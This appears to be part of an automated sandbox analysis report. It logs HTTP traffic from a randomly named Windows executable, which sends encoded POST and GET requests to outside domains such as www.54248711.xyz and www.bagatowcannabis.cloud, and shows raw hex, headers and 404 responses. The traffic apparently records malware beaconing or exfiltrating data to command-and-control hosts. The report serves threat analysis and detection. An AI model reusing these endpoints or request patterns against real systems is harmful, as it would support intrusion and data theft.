                                                                                Dec 14, 2024 13:53:00.357433081 CET1236INData Raw: 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72
                                                                                Data Ascii: ;justify-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem
                                                                                Dec 14, 2024 13:53:00.357573986 CET1236INData Raw: 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e
                                                                                Data Ascii: w - 20rem)/ 25.625)}}@supports (padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)}}@supports not (padding-right:clamp(1.5rem ,-4.
                                                                                Dec 14, 2024 13:53:00.357609987 CET1236INData Raw: 32 36 38 32 39 32 36 38 33 76 77 20 2c 32 2e 32 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 35 72 65 6d 20 2b 20 2e 37 35 2a 28 31 30 30 76 77 20 2d 20 32 30
                                                                                Data Ascii: 268292683vw ,2.25rem)){.window-main__title{font-size:calc(1.5rem + .75*(100vw - 20rem)/ 25.625)}}@supports (font-size:clamp(0.875rem ,0.7286585366rem + 0.7317073171vw ,1.0625rem)){.window-main__body{font-size:clamp(.875rem ,.7286585366rem + .7
                                                                                Dec 14, 2024 13:53:00.357646942 CET1236INData Raw: 6d 70 28 2e 37 35 72 65 6d 20 2c 2e 36 35 32 34 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c
                                                                                Data Ascii: mp(.75rem ,.6524390244rem + .487804878vw ,.875rem)}}@supports not (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:calc(.75rem + .125*(100vw - 20rem)/ 25.625)}}@supports (margin-top:clamp
                                                                                Dec 14, 2024 13:53:00.357687950 CET1236INData Raw: 09 09 09 09 3c 2f 67 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 31 5f 66 5f 32 30 30 31 5f 35 29 22 3e 0a 09 09 09 09 09 09 09 3c 65 6c 6c 69 70 73 65 20 63
                                                                                Data Ascii: </g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.3996" rx="50.6112" ry="60.3996" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 316.613 398.839)" fill="#15B1F9" /></g><
                                                                                Dec 14, 2024 13:53:00.358001947 CET1236INData Raw: 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73 69 61 6e
                                                                                Data Ascii: in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.2946" y="36.0856" width="514.378" he
                                                                                Dec 14, 2024 13:53:00.358040094 CET1236INData Raw: 20 73 65 72 76 65 72 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09
                                                                                Data Ascii: server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View more possible reasons</a></div><svg class="svg-two" width=
                                                                                Dec 14, 2024 13:53:00.361609936 CET583INData Raw: 74 69 6f 6e 3d 22 37 35 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 31 30 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09 09 09 09 09 3c 66 69 6c 74
                                                                                Data Ascii: tion="75" result="effect1_foregroundBlur_2001_10" /></filter><filter id="filter1_f_2001_10" x="27.2657" y="0.225037" width="703.261" height="829.52" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFl


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.550054162.0.217.35806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:53:06.101859093 CET737OUTPOST /e48k/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.54248711.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.54248711.xyz
                                                                                Referer: http://www.54248711.xyz/e48k/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 38 41 4a 67 71 4c 48 58 62 43 49 46 4b 39 33 58 56 43 47 39 39 55 2f 6e 4e 57 34 76 71 64 56 4d 33 6f 6a 52 35 6c 66 6d 6d 34 56 64 34 4d 64 38 34 67 4b 71 30 4b 42 6b 6a 6c 53 35 76 2f 63 69 75 67 4b 69 36 32 42 43 38 50 41 6e 61 62 6e 43 42 77 65 6d 67 78 55 30 65 5a 61 36 6a 75 36 4a 32 79 59 35 4b 30 49 30 4d 53 6d 6e 32 70 38 34 46 46 55 63 78 73 62 4d 77 4c 31 57 2f 7a 5a 63 69 4b 76 4f 45 33 72 73 67 4f 68 75 6e 69 7a 4d 6a 6c 62 58 70 34 4d 73 35 75 32 4b 2f 37 36 61 6b 69 6d 44 53 34 5a 44 79 4f 51 4a 30 53 2f 57 58 58 71 2f 45 42 32 31 4c 33 30 32 59 77 63 63 50 67 69 76 4c 7a 30 3d
                                                                                Data Ascii: NVK8=8AJgqLHXbCIFK93XVCG99U/nNW4vqdVM3ojR5lfmm4Vd4Md84gKq0KBkjlS5v/ciugKi62BC8PAnabnCBwemgxU0eZa6ju6J2yY5K0I0MSmn2p84FFUcxsbMwL1W/zZciKvOE3rsgOhunizMjlbXp4Ms5u2K/76akimDS4ZDyOQJ0S/WXXq/EB21L302YwccPgivLz0=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.550057162.0.217.35806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:53:08.768383980 CET757OUTPOST /e48k/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.54248711.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.54248711.xyz
                                                                                Referer: http://www.54248711.xyz/e48k/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 38 41 4a 67 71 4c 48 58 62 43 49 46 46 34 6e 58 58 68 2b 39 31 55 2f 6b 55 32 34 76 6a 39 55 46 33 6f 6e 52 35 6e 7a 32 6e 4b 42 64 68 74 74 38 71 30 65 71 34 71 42 6b 6f 46 53 77 72 2f 63 70 75 67 47 71 36 79 4a 43 38 50 55 6e 61 65 44 43 64 54 32 6e 67 68 55 32 57 35 61 34 2b 2b 36 4a 32 79 59 35 4b 77 68 68 4d 53 65 6e 32 5a 4d 34 48 67 6f 64 76 63 62 50 33 4c 31 57 31 6a 5a 59 69 4b 75 74 45 32 33 4b 67 4d 70 75 6e 6e 33 4d 6a 30 61 6c 67 34 4d 69 7a 4f 33 67 75 4c 54 67 2b 6b 6d 4f 5a 62 39 65 79 66 38 73 31 6b 4f 38 4e 31 69 58 58 68 61 4e 62 6b 38 42 4a 41 39 31 56 44 79 66 56 6b 68 30 39 59 31 55 71 70 77 65 71 75 73 45 79 70 38 6a 71 45 6b 36
                                                                                Data Ascii: NVK8=8AJgqLHXbCIFF4nXXh+91U/kU24vj9UF3onR5nz2nKBdhtt8q0eq4qBkoFSwr/cpugGq6yJC8PUnaeDCdT2nghU2W5a4++6J2yY5KwhhMSen2ZM4HgodvcbP3L1W1jZYiKutE23KgMpunn3Mj0alg4MizO3guLTg+kmOZb9eyf8s1kO8N1iXXhaNbk8BJA91VDyfVkh09Y1UqpwequsEyp8jqEk6


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.550058162.0.217.35806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:53:11.435384989 CET1774OUTPOST /e48k/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.54248711.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.54248711.xyz
                                                                                Referer: http://www.54248711.xyz/e48k/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 38 41 4a 67 71 4c 48 58 62 43 49 46 46 34 6e 58 58 68 2b 39 31 55 2f 6b 55 32 34 76 6a 39 55 46 33 6f 6e 52 35 6e 7a 32 6e 4c 35 64 39 50 6c 38 34 46 65 71 37 71 42 6b 68 6c 53 31 72 2f 63 30 75 6a 32 6d 36 79 4e 38 38 4d 73 6e 62 34 66 43 52 79 32 6e 72 68 55 32 61 5a 61 37 6a 75 36 59 32 79 6f 31 4b 30 4e 68 4d 53 65 6e 32 62 55 34 44 31 55 64 74 63 62 4d 77 4c 31 67 2f 7a 5a 6b 69 4a 66 57 45 32 69 78 67 63 4a 75 6e 48 48 4d 67 47 79 6c 34 6f 4d 67 30 4f 33 34 75 4c 50 46 2b 6b 53 6f 5a 61 49 57 79 63 63 73 33 31 58 39 61 55 37 50 43 53 61 4d 55 55 73 79 54 56 6c 76 4b 6c 6d 61 63 44 78 61 68 64 4d 2b 2f 2f 77 39 6f 4f 78 55 6c 74 41 30 6c 52 70 36 38 56 5a 78 42 57 77 38 6e 46 39 6a 36 6d 71 4d 35 75 71 76 31 5a 45 6a 6f 32 4f 58 30 38 79 65 48 77 42 43 66 55 77 4f 56 43 6d 45 7a 70 74 6c 73 4f 79 58 73 41 51 72 64 46 51 39 77 45 35 33 2b 72 44 66 57 2b 51 57 70 6d 37 44 78 57 41 72 33 48 75 2b 69 4c 32 32 73 41 43 4c 58 67 64 37 30 65 55 48 67 67 2b 75 4a 43 30 63 48 46 37 76 55 [TRUNCATED]
                                                                                Data Ascii: NVK8=8AJgqLHXbCIFF4nXXh+91U/kU24vj9UF3onR5nz2nL5d9Pl84Feq7qBkhlS1r/c0uj2m6yN88Msnb4fCRy2nrhU2aZa7ju6Y2yo1K0NhMSen2bU4D1UdtcbMwL1g/zZkiJfWE2ixgcJunHHMgGyl4oMg0O34uLPF+kSoZaIWyccs31X9aU7PCSaMUUsyTVlvKlmacDxahdM+//w9oOxUltA0lRp68VZxBWw8nF9j6mqM5uqv1ZEjo2OX08yeHwBCfUwOVCmEzptlsOyXsAQrdFQ9wE53+rDfW+QWpm7DxWAr3Hu+iL22sACLXgd70eUHgg+uJC0cHF7vUpfL6ajrXsczd/TN/+yV9KWAn6ZCQ1bfDpiJoVQk4eqGEHXxkczxkvbQEgrnbZOkX1IJQlUnVhKHYORdKd7V26CnxnmWs2zu46szCLI+70HpIwtoa4qUsAqW7dHmKSDIZM19aoOaeiAxntNT3wJFKjAMartJxL36xB0hl8lqaP+wKrJp/CnY03875BnzRW2oFremf4fIX4KPnFXzE/sah+RqohrADvKniLQ4Pp5bbsI8BldvDalTf/SxN15JFuLsU8RZp3SZFsrrI3uNeJYgKm+Yxt1VT0UEdo4/ZxvWeEJOBUYeIracP+ynv/04CRCrUu8boZ4PUQdMlj80HQ+oDjc/bcyksb4NjwWtyDFP6CYb8mo90B/k/lMMXrZDxcPMnSujC3wZyQpzHo+4bj/m7HAu85SCbyrCrisnz4TO1Dja+INiCyDGfrrM3C7AvThj4ONGI6BEUNLyzLbuKg7qJDDuRyX2DwUB5HyGekXw17PpzqkwlHMGqZiIXlRoP6mTejYUDcFSysqfXWuDMfR1wqTcVyMw9ALL+FIeYFTBULKx2EaAsX3cZUUEONc1RgLTiNZsfaRu+M+G2DgE54VBi5j3xnob2aJliZK+3cm5OEpNpg0oO1SGYhBhezBaqbm/L7iTubZoika7vccHMU4ZDzPuYxmtQme2f0e [TRUNCATED]
                                                                                Dec 14, 2024 13:53:13.018359900 CET1236INHTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 1251
                                                                                date: Sat, 14 Dec 2024 12:53:12 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                                                Dec 14, 2024 13:53:13.018394947 CET316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                                                Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.550059162.0.217.35806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:53:14.092714071 CET481OUTGET /e48k/?V6T=lB24KzN0lF-8&NVK8=xChAp+bkagQqJ6WkRQ2a7hjYaWsF9/M9/8HR53jdsKBVrNgXqnyx46Jn2F+RutsZwBel4mZ5ysAGK73cAQnl7mQqaam/kdOg/hlIEVseDVvXkJ4BLCZJtbvg9L026A0VzA== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.54248711.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:53:15.421649933 CET1236INHTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 1251
                                                                                date: Sat, 14 Dec 2024 12:53:15 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                                                Dec 14, 2024 13:53:15.421708107 CET316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                                                Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                49192.168.2.55006081.2.196.19806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:53:21.208895922 CET764OUTPOST /zmax/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bagatowcannabis.cloud
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.bagatowcannabis.cloud
                                                                                Referer: http://www.bagatowcannabis.cloud/zmax/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 52 36 70 6b 4f 6d 55 4b 68 47 35 74 66 46 67 56 4b 54 51 6a 77 69 72 6b 2b 73 30 42 4c 72 30 77 43 4f 69 6d 76 4c 54 4f 65 32 6b 4b 37 63 49 71 74 50 77 78 53 50 7a 35 45 56 6a 78 32 46 39 31 4a 39 31 70 49 74 5a 33 5a 46 72 37 39 6f 71 51 37 55 57 6c 74 4f 49 51 34 63 58 75 75 73 45 68 6d 54 44 6b 47 53 6d 68 6c 72 33 6a 56 67 35 4a 4e 74 42 36 2b 4c 54 37 44 35 41 65 39 6c 72 47 54 74 45 66 75 7a 63 58 51 4e 79 49 72 47 7a 59 4a 71 78 4d 63 6f 6a 42 4e 62 74 38 79 4a 34 43 4d 69 73 74 2b 66 7a 63 46 62 6a 69 61 43 37 4a 64 55 54 50 57 67 49 73 4d 48 53 65 46 37 62 61 4e 38 76 70 2f 6f 67 3d
                                                                                Data Ascii: NVK8=R6pkOmUKhG5tfFgVKTQjwirk+s0BLr0wCOimvLTOe2kK7cIqtPwxSPz5EVjx2F91J91pItZ3ZFr79oqQ7UWltOIQ4cXuusEhmTDkGSmhlr3jVg5JNtB6+LT7D5Ae9lrGTtEfuzcXQNyIrGzYJqxMcojBNbt8yJ4CMist+fzcFbjiaC7JdUTPWgIsMHSeF7baN8vp/og=
                                                                                Dec 14, 2024 13:53:22.487040997 CET355INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:53:22 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                50192.168.2.55006181.2.196.19806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:53:23.879235983 CET784OUTPOST /zmax/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bagatowcannabis.cloud
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.bagatowcannabis.cloud
                                                                                Referer: http://www.bagatowcannabis.cloud/zmax/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 52 36 70 6b 4f 6d 55 4b 68 47 35 74 4f 55 51 56 4d 77 49 6a 37 69 72 6a 39 73 30 42 41 4c 31 35 43 4f 65 6d 76 50 6a 6b 5a 46 51 4b 31 64 34 71 75 4f 77 78 42 2f 7a 35 4c 31 6a 4f 34 6c 39 38 4a 38 4a 62 49 6f 5a 33 5a 46 2f 37 39 71 79 51 37 6e 2b 6b 73 65 49 53 30 38 58 6f 6a 4d 45 68 6d 54 44 6b 47 53 43 48 6c 72 76 6a 56 52 4a 4a 66 63 42 37 30 72 54 34 56 70 41 65 35 6c 72 4b 54 74 46 77 75 33 63 35 51 50 36 49 72 47 6a 59 4a 35 70 4e 46 59 6a 48 51 4c 73 34 7a 35 39 55 42 41 73 38 6a 38 71 65 45 4a 2f 59 53 55 4b 6a 48 32 62 6e 46 41 6b 55 63 55 61 70 55 4c 36 7a 58 66 2f 5a 68 2f 33 52 5a 6d 37 72 4f 58 6d 52 6d 70 41 51 61 45 4a 6b 76 6a 35 73
                                                                                Data Ascii: NVK8=R6pkOmUKhG5tOUQVMwIj7irj9s0BAL15COemvPjkZFQK1d4quOwxB/z5L1jO4l98J8JbIoZ3ZF/79qyQ7n+kseIS08XojMEhmTDkGSCHlrvjVRJJfcB70rT4VpAe5lrKTtFwu3c5QP6IrGjYJ5pNFYjHQLs4z59UBAs8j8qeEJ/YSUKjH2bnFAkUcUapUL6zXf/Zh/3RZm7rOXmRmpAQaEJkvj5s
                                                                                Dec 14, 2024 13:53:25.151479959 CET355INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:53:24 GMT
